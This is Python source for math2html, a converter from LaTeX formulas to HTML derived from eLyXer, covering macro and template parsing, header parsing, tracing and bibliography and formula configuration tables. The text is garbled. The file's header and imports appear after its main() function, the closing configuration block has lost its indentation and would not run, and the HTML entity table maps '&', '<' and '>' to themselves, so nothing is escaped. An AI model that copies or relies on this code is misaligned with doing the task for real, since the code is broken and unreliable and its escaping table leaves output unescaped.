        self.literalvalue = function.parseliteral(pos)
      if self.literalvalue:
        self.value = FormulaConstant(self.literalvalue)
    elif self.optional:
      self.value = function.parsesquare(pos)
    else:
      self.value = function.parseparameter(pos)
  def __unicode__(self):
    "Return a printable representation."
    result = 'param ' + self.name
    if self.value:
      result += ': ' + unicode(self.value)
    else:
      result += ' (empty)'
    return result
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class ParameterFunction(CommandBit):
  """A function with a variable number of parameters defined in a template.
  The parameters are defined as a parameter definition.
  (The second line above was originally a separate bare string statement,
  i.e. dead code; merged into the docstring.)
  """
  def readparams(self, readtemplate, pos):
    "Read the params according to the template."
    self.params = dict()
    for paramdef in self.paramdefs(readtemplate):
      paramdef.read(pos, self)
      self.params['$' + paramdef.name] = paramdef
  def paramdefs(self, readtemplate):
    "Read each param definition in the template"
    pos = TextPosition(readtemplate)
    while not pos.finished():
      paramdef = ParameterDefinition().parse(pos)
      if paramdef:
        yield paramdef
  def getparam(self, name):
    "Get a parameter as parsed, or None when not defined."
    if name not in self.params:
      return None
    return self.params[name]
  def getvalue(self, name):
    "Get the value of a parameter."
    return self.getparam(name).value
  def getliteralvalue(self, name):
    "Get the literal value of a parameter, or None when absent."
    param = self.getparam(name)
    if not param or not param.literalvalue:
      return None
    return param.literalvalue
class HybridFunction(ParameterFunction):
  """
  A parameter function where the output is also defined using a template.
  The template can use a number of functions; each function has an associated
  tag.
  Example: [f0{$1},span class="fbox"] defines a function f0 which corresponds
  to a span of class fbox, yielding <span class="fbox">$1</span>.
  Literal parameters can be used in tags definitions:
    [f0{$1},span style="color: $p;"]
  yields <span style="color: $p;">$1</span>, where $p is a literal parameter.
  Sizes can be specified in hybridsizes, e.g. adding parameter sizes. By
  default the resulting size is the max of all arguments. Sizes are used
  to generate the right parameters.
  A function followed by a single / is output as a self-closing XHTML tag:
    [f0/,hr]
  will generate <hr/>.
  """
  commandmap = FormulaConfig.hybridfunctions
  def parsebit(self, pos):
    "Parse a function with [] and {} parameters"
    # translated[0] is the read template, translated[1] the write template
    readtemplate = self.translated[0]
    writetemplate = self.translated[1]
    self.readparams(readtemplate, pos)
    self.contents = self.writeparams(writetemplate)
    self.computehybridsize()
  def writeparams(self, writetemplate):
    "Write all params according to the template"
    return self.writepos(TextPosition(writetemplate))
  def writepos(self, pos):
    "Write all params as read in the parse position."
    result = []
    while not pos.finished():
      if pos.checkskip('$'):
        # a parameter substitution: $0, $x...
        param = self.writeparam(pos)
        if param:
          result.append(param)
      elif pos.checkskip('f'):
        # a function application: f0{...} or self-closing f0/
        function = self.writefunction(pos)
        if function:
          function.type = None
          result.append(function)
      elif pos.checkskip('('):
        result.append(self.writebracket('left', '('))
      elif pos.checkskip(')'):
        result.append(self.writebracket('right', ')'))
      else:
        # anything else is copied through as a constant
        result.append(FormulaConstant(pos.skipcurrent()))
    return result
  def writeparam(self, pos):
    "Write a single param of the form $0, $x..."
    name = '$' + pos.skipcurrent()
    if not name in self.params:
      Trace.error('Unknown parameter ' + name)
      return None
    if not self.params[name]:
      return None
    if pos.checkskip('.'):
      # a trailing .word sets the type of the parameter value
      self.params[name].value.type = pos.globalpha()
    return self.params[name].value
  def writefunction(self, pos):
    "Write a single function f0,...,fn."
    tag = self.readtag(pos)
    if not tag:
      return None
    if pos.checkskip('/'):
      # self-closing XHTML tag, such as <hr/>
      return TaggedBit().selfcomplete(tag)
    if not pos.checkskip('{'):
      Trace.error('Function should be defined in {}')
      return None
    pos.pushending('}')
    contents = self.writepos(pos)
    pos.popending()
    if len(contents) == 0:
      return None
    return TaggedBit().complete(contents, tag)
  def readtag(self, pos):
    "Get the tag corresponding to the given index. Does parameter substitution."
    if not pos.current().isdigit():
      Trace.error('Function should be f0,...,f9: f' + pos.current())
      return None
    index = int(pos.skipcurrent())
    # tags start at translated[2]: [0] and [1] are the two templates
    if 2 + index > len(self.translated):
      Trace.error('Function f' + unicode(index) + ' is not defined')
      return None
    tag = self.translated[2 + index]
    if not '$' in tag:
      return tag
    # substitute literal parameters into the tag text
    for variable in self.params:
      if variable in tag:
        param = self.params[variable]
        if not param.literal:
          Trace.error('Parameters in tag ' + tag + ' should be literal: {' + variable + '!}')
          continue
        if param.literalvalue:
          value = param.literalvalue
        else:
          value = ''
        tag = tag.replace(variable, value)
    return tag
  def writebracket(self, direction, character):
    "Return a new bracket looking at the given direction."
    return self.factory.create(BracketCommand).create(direction, character)
  def computehybridsize(self):
    "Compute the size of the hybrid function."
    if not self.command in HybridSize.configsizes:
      self.computesize()
      return
    self.size = HybridSize().getsize(self)
    # set the size in all elements at first level
    for element in self.contents:
      element.size = self.size
class HybridSize(object):
  "The size associated with a hybrid function."
  configsizes = FormulaConfig.hybridsizes
  def getsize(self, function):
    "Read the size for a function and parse it."
    sizestring = self.configsizes[function.command]
    # substitute each parameter's computed size into the expression
    for name in function.params:
      if name in sizestring:
        size = function.params[name].value.computesize()
        sizestring = sizestring.replace(name, unicode(size))
    if '$' in sizestring:
      Trace.error('Unconverted variable in hybrid size: ' + sizestring)
      return 1
    # the expression comes from the bundled configuration, not user input;
    # eval on untrusted data would be unsafe
    return eval(sizestring)
FormulaCommand.types += [HybridFunction]
class HeaderParser(Parser):
  "Parses the LyX header"
  def parse(self, reader):
    "Parse header parameters into a dictionary, return the preamble."
    contents = []
    self.parseending(reader, lambda: self.parseline(reader, contents))
    # skip last line
    reader.nextline()
    return contents
  def parseline(self, reader, contents):
    "Parse a single line as a parameter or as a start"
    line = reader.currentline()
    if line.startswith(HeaderConfig.parameters['branch']):
      self.parsebranch(reader)
      return
    elif line.startswith(HeaderConfig.parameters['lstset']):
      LstParser().parselstset(reader)
      return
    elif line.startswith(HeaderConfig.parameters['beginpreamble']):
      contents.append(self.factory.createcontainer(reader))
      return
    # no match
    self.parseparameter(reader)
  def parsebranch(self, reader):
    "Parse all branch definitions."
    branch = reader.currentline().split()[1]
    reader.nextline()
    # a nested header parser consumes everything up to the branch end
    subparser = HeaderParser().complete(HeaderConfig.parameters['endbranch'])
    subparser.parse(reader)
    options = BranchOptions(branch)
    for key in subparser.parameters:
      options.set(key, subparser.parameters[key])
    Options.branches[branch] = options
  def complete(self, ending):
    "Complete the parser with the given ending; fluent."
    self.ending = ending
    return self
class PreambleParser(Parser):
  "A parser for the LyX preamble."
  # class-level: the collected preamble is shared document-wide state
  preamble = []
  def parse(self, reader):
    "Parse the full preamble with all statements."
    self.ending = HeaderConfig.parameters['endpreamble']
    self.parseending(reader, lambda: self.parsepreambleline(reader))
    return []
  def parsepreambleline(self, reader):
    "Store a single preamble line and advance the reader."
    PreambleParser.preamble.append(reader.currentline())
    reader.nextline()
class LstParser(object):
  "Parse global and local lstparams."
  # global parameters shared by all listings, set by \lstset
  globalparams = dict()
  def parselstset(self, reader):
    "Parse a declaration of lstparams in lstset."
    paramtext = self.extractlstset(reader)
    if not '{' in paramtext:
      Trace.error('Missing opening bracket in lstset: ' + paramtext)
      return
    # NOTE(review): assumes a single {...} group; a '{' inside the
    # parameters would truncate them -- confirm against real lstset input
    lefttext = paramtext.split('{')[1]
    croppedtext = lefttext[:-1]
    LstParser.globalparams = self.parselstparams(croppedtext)
  def extractlstset(self, reader):
    "Extract the global lstset parameters, possibly spanning several lines."
    paramtext = ''
    while not reader.finished():
      paramtext += reader.currentline()
      reader.nextline()
      if paramtext.endswith('}'):
        return paramtext
    Trace.error('Could not find end of \\lstset settings; aborting')
  def parsecontainer(self, container):
    "Parse some lstparams from a container, merging over the global params."
    container.lstparams = LstParser.globalparams.copy()
    paramlist = container.getparameterlist('lstparams')
    container.lstparams.update(self.parselstparams(paramlist))
  def parselstparams(self, paramlist):
    "Process a number of key=value lstparams from a list."
    paramdict = dict()
    for param in paramlist:
      if not '=' in param:
        if len(param.strip()) > 0:
          Trace.error('Invalid listing parameter ' + param)
      else:
        key, value = param.split('=', 1)
        paramdict[key] = value
    return paramdict
class MacroDefinition(CommandBit):
  "A function that defines a new command (a macro)."
  # registry of all defined macros, shared with MacroFunction.commandmap
  macros = dict()
  def parsebit(self, pos):
    "Parse the function that defines the macro."
    self.output = EmptyOutput()
    self.parameternumber = 0
    self.defaults = []
    # flag the factory while parsing the definition (presumably so that
    # #n macro parameters are accepted -- see MacroParameter)
    self.factory.defining = True
    self.parseparameters(pos)
    self.factory.defining = False
    Trace.debug('New command ' + self.newcommand + ' (' + \
        unicode(self.parameternumber) + ' parameters)')
    self.macros[self.newcommand] = self
  def parseparameters(self, pos):
    """Parse all optional parameters (number of parameters, default values)
    and the mandatory definition. (The second line was originally a bare
    string statement after the docstring, i.e. dead code; merged here.)"""
    self.newcommand = self.parsenewcommand(pos)
    # parse number of parameters
    literal = self.parsesquareliteral(pos)
    if literal:
      self.parameternumber = int(literal)
    # parse all default values
    bracket = self.parsesquare(pos)
    while bracket:
      self.defaults.append(bracket)
      bracket = self.parsesquare(pos)
    # parse mandatory definition
    self.definition = self.parseparameter(pos)
  def parsenewcommand(self, pos):
    "Parse the name of the new command."
    self.factory.clearskipped(pos)
    if self.factory.detecttype(Bracket, pos):
      return self.parseliteral(pos)
    if self.factory.detecttype(FormulaCommand, pos):
      return self.factory.create(FormulaCommand).extractcommand(pos)
    Trace.error('Unknown formula bit in defining function at ' + pos.identifier())
    return 'unknown'
  def instantiate(self):
    "Return a fresh instance (clone) of the macro definition."
    return self.definition.clone()
class MacroParameter(FormulaBit):
  "A parameter from a macro."
  def detect(self, pos):
    "Find a macro parameter: #n."
    return pos.checkfor('#')
  def parsebit(self, pos):
    "Parse the parameter: #n."
    if not pos.checkskip('#'):
      Trace.error('Missing parameter start #.')
      return
    self.number = int(pos.skipcurrent())
    self.original = '#' + unicode(self.number)
    # shown as-is until a macro invocation substitutes the actual value
    self.contents = [TaggedBit().constant('#' + unicode(self.number), 'span class="unknown"')]
class MacroFunction(CommandBit):
  "A function that was defined using a macro."
  # shared with MacroDefinition: maps macro names to their definitions
  commandmap = MacroDefinition.macros
  def parsebit(self, pos):
    "Parse a number of input parameters."
    self.output = FilteredOutput()
    self.values = []
    macro = self.translated
    self.parseparameters(pos, macro)
    self.completemacro(macro)
  def parseparameters(self, pos, macro):
    "Parse as many parameters as are needed."
    self.parseoptional(pos, list(macro.defaults))
    self.parsemandatory(pos, macro.parameternumber - len(macro.defaults))
    if len(self.values) < macro.parameternumber:
      Trace.error('Missing parameters in macro ' + unicode(self))
  def parseoptional(self, pos, defaults):
    "Parse optional parameters, falling back to the macro defaults."
    optional = []
    while self.factory.detecttype(SquareBracket, pos):
      optional.append(self.parsesquare(pos))
      if len(optional) > len(defaults):
        break
    for value in optional:
      default = defaults.pop()
      if len(value.contents) > 0:
        self.values.append(value)
      else:
        # empty [] falls back to the default value
        self.values.append(default)
    self.values += defaults
  def parsemandatory(self, pos, number):
    "Parse a number of mandatory parameters."
    for index in range(number):
      parameter = self.parsemacroparameter(pos, number - index)
      if not parameter:
        return
      self.values.append(parameter)
  def parsemacroparameter(self, pos, remaining):
    """Parse a macro parameter: a bracket or a single letter.
    A running number with exactly as many digits as remaining parameters
    is split into separate digit parameters (e.g. 12 acts as {1}{2})."""
    self.factory.clearskipped(pos)
    if pos.finished():
      return None
    if self.factory.detecttype(FormulaNumber, pos):
      return self.parsenumbers(pos, remaining)
    return self.parseparameter(pos)
  def parsenumbers(self, pos, remaining):
    """Parse the remaining parameters as a running number,
    e.g. 12 as {1}{2}; returns None when all digits were consumed."""
    number = self.factory.parsetype(FormulaNumber, pos)
    if not len(number.original) == remaining:
      return number
    for digit in number.original:
      value = self.factory.create(FormulaNumber)
      value.add(FormulaConstant(digit))
      value.type = number
      self.values.append(value)
    return None
  def completemacro(self, macro):
    "Complete the macro with the parameters read."
    self.contents = [macro.instantiate()]
    replaced = [False] * len(self.values)
    for parameter in self.searchall(MacroParameter):
      index = parameter.number - 1
      if index >= len(self.values):
        Trace.error('Macro parameter index out of bounds: ' + unicode(index))
        return
      replaced[index] = True
      parameter.contents = [self.values[index].clone()]
    # parameters not present in the definition tree become output filters
    for index in range(len(self.values)):
      if not replaced[index]:
        self.addfilter(index, self.values[index])
  def addfilter(self, index, value):
    "Add an output filter for the given parameter number and value."
    original = '#' + unicode(index + 1)
    # BUGFIX: the original shadowed the value parameter with
    # self.values[0].gethtml(), so every filtered parameter received
    # the HTML of the FIRST value instead of its own
    html = ''.join(value.gethtml())
    self.output.addfilter(original, html)
class FormulaMacro(Formula):
    "A math macro defined in an inset."
    def __init__(self):
        # NOTE(review): deliberately does not call Formula.__init__ — the
        # macro inset is parsed by MacroParser and emits no output of its own.
        self.parser = MacroParser()
        self.output = EmptyOutput()
    def __unicode__(self):
        "Return a printable representation."
        return 'Math macro'
    # On Python 3 str() must produce the same printable representation.
    if sys.version_info >= (3, 0):
        __str__ = __unicode__
# Register the macro containers with the formula parsing machinery.
FormulaFactory.types += [ MacroParameter ]
FormulaCommand.types += [
    MacroFunction,
    ]
def math2html(formula):
    "Translate a TeX math string into its HTML representation."
    parsed = FormulaFactory().parseformula(formula)
    FormulaProcessor().process(parsed)
    parsed.process()
    return ''.join(parsed.gethtml())
def main():
    "Main entry point when invoked from the command line."
    args = sys.argv
    # parseoptions presumably consumes the program name and any option flags
    # from args in place — TODO confirm against Options.parseoptions.
    Options().parseoptions(args)
    if len(args) != 1:
        # Exactly one operand (the escaped formula string) must remain.
        Trace.error('Usage: math2html.py escaped_string')
        exit()
    result = math2html(args[0])
    Trace.message(result)
# Allow use both as an importable module and as a command-line tool.
if __name__ == '__main__':
    main()
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# math2html: convert LaTeX equations to HTML output.
#
# Copyright (C) 2009-2011 Alex Fernández
#
# Released under the terms of the `2-Clause BSD license'_, in short:
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved.
# This file is offered as-is, without any warranty.
#
# .. _2-Clause BSD license: http://www.spdx.org/licenses/BSD-2-Clause
# Based on eLyXer: convert LyX source files to HTML output.
# http://alexfernandez.github.io/elyxer/
# --end--
# Alex 20101110
# eLyXer standalone formula conversion to HTML.
import codecs
import datetime
import gettext
import io
import os.path
import sys
import unicodedata
# Python 2/3 compatibility: quote_plus moved to urllib.parse in Python 3.
if sys.version_info >= (3, 0):
    from urllib.parse import quote_plus
else:
    from urllib import quote_plus
# Python 3 removed these builtins; alias them so Python 2 idioms keep working.
if sys.version_info >= (3, 0):
    unicode = str  # noqa
    basestring = str  # noqa
    file = io.IOBase  # noqa
class Trace(object):
    "Console tracing with debug, quiet and line-prefix switches."
    debugmode = False
    quietmode = False
    showlinesmode = False
    prefix = None

    @classmethod
    def debug(cls, message):
        "Emit a debug message (only when debug mode is on and quiet is off)."
        if not Trace.debugmode or Trace.quietmode:
            return
        Trace.show(message, sys.stdout)

    @classmethod
    def message(cls, message):
        "Emit an informational message to stdout unless in quiet mode."
        if Trace.quietmode:
            return
        if Trace.prefix and Trace.showlinesmode:
            message = Trace.prefix + message
        Trace.show(message, sys.stdout)

    @classmethod
    def error(cls, message):
        "Emit an error message, marked with '* ', to stderr."
        message = '* ' + message
        if Trace.prefix and Trace.showlinesmode:
            message = Trace.prefix + message
        Trace.show(message, sys.stderr)

    @classmethod
    def fatal(cls, message):
        "Emit a fatal error message and terminate the process."
        Trace.error('FATAL: ' + message)
        exit(-1)

    @classmethod
    def show(cls, message, channel):
        "Write a message plus newline to the given channel."
        if sys.version_info < (3, 0):
            # Python 2 file objects expect encoded bytes.
            message = message.encode('utf-8')
        channel.write(message + '\n')
class BibStylesConfig(object):
    "Bibliography formatting templates, one dict per BibTeX style."
    # Each dict maps an entry type (u'@article', ...) to a template string;
    # u'cite' formats in-text citations and u'default' is the fallback.
    abbrvnat = {
        u'@article': u'$authors. $title. <i>$journal</i>,{ {$volume:}$pages,} $month $year.{ doi: $doi.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$surname($year)',
        u'default': u'$authors. <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    alpha = {
        u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{: $pages}{, $year}.}{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
        u'cite': u'$Sur$YY',
        u'default': u'$authors. $title.{ <i>$journal</i>,} $year.{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
    }
    authordate2 = {
        u'@article': u'$authors. $year. $title. <i>$journal</i>, <b>$volume</b>($number), $pages.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$surname, $year',
        u'default': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    default = {
        u'@article': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'{$authors: }<i>$title</i>{ ($editor, ed.)}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@booklet': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@conference': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@inbook': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@incollection': u'$authors: <i>$title</i>{ in <i>$booktitle</i>{ ($editor, ed.)}}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@inproceedings': u'$authors: “$title”, <i>$booktitle</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@manual': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@mastersthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@misc': u'$authors: <i>$title</i>.{{ $publisher,}{ $howpublished,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@phdthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@proceedings': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@techreport': u'$authors: <i>$title</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@unpublished': u'$authors: “$title”, <i>$journal</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    # Fallback values used when a tag is missing from an entry.
    defaulttags = {
        u'YY': u'??', u'authors': u'', u'surname': u'',
    }
    ieeetr = {
        u'@article': u'$authors, “$title”, <i>$journal</i>, vol. $volume, no. $number, pp. $pages, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors, <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'$authors, “$title”. $year.{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    plain = {
        u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors. <i>$title</i>. $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@incollection': u'$authors. $title.{ In <i>$booktitle</i> {($editor, ed.)}.} $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@inproceedings': u'$authors. $title. { <i>$booktitle</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'{$authors. }$title.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    vancouver = {
        u'@article': u'$authors. $title. <i>$journal</i>, $year{;{<b>$volume</b>}{($number)}{:$pages}}.{ URL: <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors. $title. {$publisher, }$year.{ URL: <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'$authors. $title; {$publisher, }$year.{ $howpublished.}{ URL: <a href="$url">$url</a>.}{ $note.}',
    }
class BibTeXConfig(object):
    "Literal text replacements applied while processing BibTeX entries."
    replaced = {
        u'--': u'—', u'..': u'.',
    }
class ContainerConfig(object):
    "Mappings that drive LyX container parsing (from the config file)."
    # Terminator line expected for each container type.
    endings = {
        u'Align': u'\\end_layout', u'BarredText': u'\\bar',
        u'BoldText': u'\\series', u'Cell': u'</cell',
        u'ChangeDeleted': u'\\change_unchanged',
        u'ChangeInserted': u'\\change_unchanged', u'ColorText': u'\\color',
        u'EmphaticText': u'\\emph', u'Hfill': u'\\hfill', u'Inset': u'\\end_inset',
        u'Layout': u'\\end_layout', u'LyXFooter': u'\\end_document',
        u'LyXHeader': u'\\end_header', u'Row': u'</row', u'ShapedText': u'\\shape',
        u'SizeText': u'\\size', u'StrikeOut': u'\\strikeout',
        u'TextFamily': u'\\family', u'VersalitasText': u'\\noun',
    }
    # Container classes to keep, clone or unwrap when extracting plain text.
    extracttext = {
        u'allowed': [u'StringContainer', u'Constant', u'FormulaConstant',],
        u'cloned': [u'',],
        u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula', u'Bracket', u'RawText', u'BibTag', u'FormulaNumber', u'AlphaCommand', u'EmptyCommand', u'OneParamFunction', u'SymbolFunction', u'TextFunction', u'FontFunction', u'CombiningFunction', u'DecoratingFunction', u'FormulaSymbol', u'BracketCommand', u'TeXCode',],
    }
    # Matching end marker for each begin marker.
    startendings = {
        u'\\begin_deeper': u'\\end_deeper', u'\\begin_inset': u'\\end_inset',
        u'\\begin_layout': u'\\end_layout',
    }
    # Map from the start of a LyX source line to the container class name
    # that parses it; longer (more specific) keys take precedence.
    starts = {
        u'': u'StringContainer', u'#LyX': u'BlackBox', u'</lyxtabular': u'BlackBox',
        u'<cell': u'Cell', u'<column': u'Column', u'<row': u'Row',
        u'\\align': u'Align', u'\\bar': u'BarredText',
        u'\\bar default': u'BlackBox', u'\\bar no': u'BlackBox',
        u'\\begin_body': u'BlackBox', u'\\begin_deeper': u'DeeperList',
        u'\\begin_document': u'BlackBox', u'\\begin_header': u'LyXHeader',
        u'\\begin_inset Argument': u'ShortTitle',
        u'\\begin_inset Box': u'BoxInset', u'\\begin_inset Branch': u'Branch',
        u'\\begin_inset Caption': u'Caption',
        u'\\begin_inset CommandInset bibitem': u'BiblioEntry',
        u'\\begin_inset CommandInset bibtex': u'BibTeX',
        u'\\begin_inset CommandInset citation': u'BiblioCitation',
        u'\\begin_inset CommandInset href': u'URL',
        u'\\begin_inset CommandInset include': u'IncludeInset',
        u'\\begin_inset CommandInset index_print': u'PrintIndex',
        u'\\begin_inset CommandInset label': u'Label',
        u'\\begin_inset CommandInset line': u'LineInset',
        u'\\begin_inset CommandInset nomencl_print': u'PrintNomenclature',
        u'\\begin_inset CommandInset nomenclature': u'NomenclatureEntry',
        u'\\begin_inset CommandInset ref': u'Reference',
        u'\\begin_inset CommandInset toc': u'TableOfContents',
        u'\\begin_inset ERT': u'ERT', u'\\begin_inset Flex': u'FlexInset',
        u'\\begin_inset Flex Chunkref': u'NewfangledChunkRef',
        u'\\begin_inset Flex Marginnote': u'SideNote',
        u'\\begin_inset Flex Sidenote': u'SideNote',
        u'\\begin_inset Flex URL': u'FlexURL', u'\\begin_inset Float': u'Float',
        u'\\begin_inset FloatList': u'ListOf', u'\\begin_inset Foot': u'Footnote',
        u'\\begin_inset Formula': u'Formula',
        u'\\begin_inset FormulaMacro': u'FormulaMacro',
        u'\\begin_inset Graphics': u'Image',
        u'\\begin_inset Index': u'IndexReference',
        u'\\begin_inset Info': u'InfoInset',
        u'\\begin_inset LatexCommand bibitem': u'BiblioEntry',
        u'\\begin_inset LatexCommand bibtex': u'BibTeX',
        u'\\begin_inset LatexCommand cite': u'BiblioCitation',
        u'\\begin_inset LatexCommand citealt': u'BiblioCitation',
        u'\\begin_inset LatexCommand citep': u'BiblioCitation',
        u'\\begin_inset LatexCommand citet': u'BiblioCitation',
        u'\\begin_inset LatexCommand htmlurl': u'URL',
        u'\\begin_inset LatexCommand index': u'IndexReference',
        u'\\begin_inset LatexCommand label': u'Label',
        u'\\begin_inset LatexCommand nomenclature': u'NomenclatureEntry',
        u'\\begin_inset LatexCommand prettyref': u'Reference',
        u'\\begin_inset LatexCommand printindex': u'PrintIndex',
        u'\\begin_inset LatexCommand printnomenclature': u'PrintNomenclature',
        u'\\begin_inset LatexCommand ref': u'Reference',
        u'\\begin_inset LatexCommand tableofcontents': u'TableOfContents',
        u'\\begin_inset LatexCommand url': u'URL',
        u'\\begin_inset LatexCommand vref': u'Reference',
        u'\\begin_inset Marginal': u'SideNote',
        u'\\begin_inset Newline': u'NewlineInset',
        u'\\begin_inset Newpage': u'NewPageInset', u'\\begin_inset Note': u'Note',
        u'\\begin_inset OptArg': u'ShortTitle',
        u'\\begin_inset Phantom': u'PhantomText',
        u'\\begin_inset Quotes': u'QuoteContainer',
        u'\\begin_inset Tabular': u'Table', u'\\begin_inset Text': u'InsetText',
        u'\\begin_inset VSpace': u'VerticalSpace', u'\\begin_inset Wrap': u'Wrap',
        u'\\begin_inset listings': u'Listing',
        u'\\begin_inset script': u'ScriptInset', u'\\begin_inset space': u'Space',
        u'\\begin_layout': u'Layout', u'\\begin_layout Abstract': u'Abstract',
        u'\\begin_layout Author': u'Author',
        u'\\begin_layout Bibliography': u'Bibliography',
        u'\\begin_layout Chunk': u'NewfangledChunk',
        u'\\begin_layout Description': u'Description',
        u'\\begin_layout Enumerate': u'ListItem',
        u'\\begin_layout Itemize': u'ListItem', u'\\begin_layout List': u'List',
        u'\\begin_layout LyX-Code': u'LyXCode',
        u'\\begin_layout Plain': u'PlainLayout',
        u'\\begin_layout Standard': u'StandardLayout',
        u'\\begin_layout Title': u'Title', u'\\begin_preamble': u'LyXPreamble',
        u'\\change_deleted': u'ChangeDeleted',
        u'\\change_inserted': u'ChangeInserted',
        u'\\change_unchanged': u'BlackBox', u'\\color': u'ColorText',
        u'\\color inherit': u'BlackBox', u'\\color none': u'BlackBox',
        u'\\emph default': u'BlackBox', u'\\emph off': u'BlackBox',
        u'\\emph on': u'EmphaticText', u'\\emph toggle': u'EmphaticText',
        u'\\end_body': u'LyXFooter', u'\\family': u'TextFamily',
        u'\\family default': u'BlackBox', u'\\family roman': u'BlackBox',
        u'\\hfill': u'Hfill', u'\\labelwidthstring': u'BlackBox',
        u'\\lang': u'LangLine', u'\\length': u'InsetLength',
        u'\\lyxformat': u'LyXFormat', u'\\lyxline': u'LyXLine',
        u'\\newline': u'Newline', u'\\newpage': u'NewPage',
        u'\\noindent': u'BlackBox', u'\\noun default': u'BlackBox',
        u'\\noun off': u'BlackBox', u'\\noun on': u'VersalitasText',
        u'\\paragraph_spacing': u'BlackBox', u'\\series bold': u'BoldText',
        u'\\series default': u'BlackBox', u'\\series medium': u'BlackBox',
        u'\\shape': u'ShapedText', u'\\shape default': u'BlackBox',
        u'\\shape up': u'BlackBox', u'\\size': u'SizeText',
        u'\\size normal': u'BlackBox', u'\\start_of_appendix': u'StartAppendix',
        u'\\strikeout default': u'BlackBox', u'\\strikeout on': u'StrikeOut',
    }
    string = {
        u'startcommand': u'\\',
    }
    # Header lines recognized at the start of a table.
    table = {
        u'headers': [u'<lyxtabular', u'<features',],
    }
class EscapeConfig(object):
    "Character and command escapes applied to output text."
    # Plain character sequences replaced in text.
    chars = {
        u'\n': u'', u' -- ': u' — ', u' --- ': u' — ', u'\'': u'’', u'`': u'‘',
    }
    # LyX special-character commands and their textual replacements.
    commands = {
        u'\\InsetSpace \\space{}': u' ', u'\\InsetSpace \\thinspace{}': u' ',
        u'\\InsetSpace ~': u' ', u'\\SpecialChar \\-': u'',
        u'\\SpecialChar \\@.': u'.', u'\\SpecialChar \\ldots{}': u'…',
        u'\\SpecialChar \\menuseparator': u' ▷ ',
        u'\\SpecialChar \\nobreakdash-': u'-', u'\\SpecialChar \\slash{}': u'/',
        u'\\SpecialChar \\textcompwordmark{}': u'', u'\\backslash': u'\\',
    }
    entities = {
        u'&': u'&', u'<': u'<', u'>': u'>',
    }
    html = {
        u'/>': u'>',
    }
    iso885915 = {
        u' ': u' ', u' ': u' ', u' ': u' ',
    }
    nonunicode = {
        u' ': u' ',
    }
class FormulaConfig(object):
"Configuration class from elyxer.config file"
alphacommands = {
u'\\AA': u'Å', u'\\AE': u'Æ',
u'\\AmS': u'<span class="versalitas">AmS</span>', u'\\Angstroem': u'Å',
u'\\DH': u'Ð', u'\\Koppa': u'Ϟ', u'\\L': u'Ł', u'\\Micro': u'µ', u'\\O': u'Ø',
u'\\OE': u'Œ', u'\\Sampi': u'Ϡ', u'\\Stigma': u'Ϛ', u'\\TH': u'Þ',
u'\\aa': u'å', u'\\ae': u'æ', u'\\alpha': u'α', u'\\beta': u'β',
u'\\delta': u'δ', u'\\dh': u'ð', u'\\digamma': u'ϝ', u'\\epsilon': u'ϵ',
u'\\eta': u'η', u'\\eth': u'ð', u'\\gamma': u'γ', u'\\i': u'ı',
u'\\imath': u'ı', u'\\iota': u'ι', u'\\j': u'ȷ', u'\\jmath': u'ȷ',
